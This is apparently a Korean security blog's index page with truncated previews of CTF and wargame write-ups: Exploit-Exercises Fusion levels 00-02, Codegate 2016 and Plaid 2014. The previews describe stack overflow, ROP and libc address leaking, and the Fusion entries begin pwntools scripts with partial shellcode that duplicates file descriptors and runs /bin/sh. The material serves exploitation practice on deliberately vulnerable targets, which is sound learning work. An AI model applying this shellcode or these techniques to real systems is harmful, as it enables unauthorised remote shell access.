[Exploit-Exercise] Fusion level02 Fusion Level02 - There is xor encryption with random value. First getting xor table.- just ROP!. leaking write() address and get system() address with 'offset'. - i just use system(). There is another way to get shell. execve()- Using execve() would be more cleaner and comfortable for making payload. 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525.. 더보기 [Exploit-Exercise] Fusion level01 Fusion Level01 - Still NX is disabled but ASLR is on. - Now, we can't get buffer address from binary. - All u need is 'jmp esp' gadget 1234567891011121314151617from pwn import * # dup2(0, 0) + dup2(0, 1) + dup2(0, 2) + execute /bin/shsc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x.. 더보기 [Exploit-Exercise] Fusion level00 Fusion Level00- There aren't any memory protections even NX. So i just use shell-code.- That service is on port 20000. and be careful at 'fd'. - In fix_path(), There is stack buffer overflow vulnerability.- RET -> 140 ~ 143 123456789101112131415161718from pwn import # dup2(0, 0) + dup2(0, 1) + dup2(0, 2) + execute /bin/shsc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\.. 더보기 [Codegate 2016] reversing : compress compress이번 문제는 그냥 암호화된 문자열하고 인코드 하는 파이썬 코드를 던져줬네요 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263import md5 def encode(input_string): print "Input : %s" % input_string h = md5.md5(input_string[:4]).hexdigest() table = { 'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5, 'f': 6, 'g': 7, 'h': 8, 'i': 9, 'j': 0 } out = "" prev = "" stage1 =.. 더보기 [Plaid 2014] pwnable : tenement & sass These write ups don't include any exploit codes but just EIP control. tenement Given binary 'tenement' is x86 stripped elf file, too. 12zero@ubuntu:~/Desktop/ctf/plaid2014$ file tenementtenement: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, strippedcs And applied memory protections are... 12345678zero@ubuntu:~.. 더보기 이전 1 ··· 7 8 9 10 11 12 13 ··· 36 다음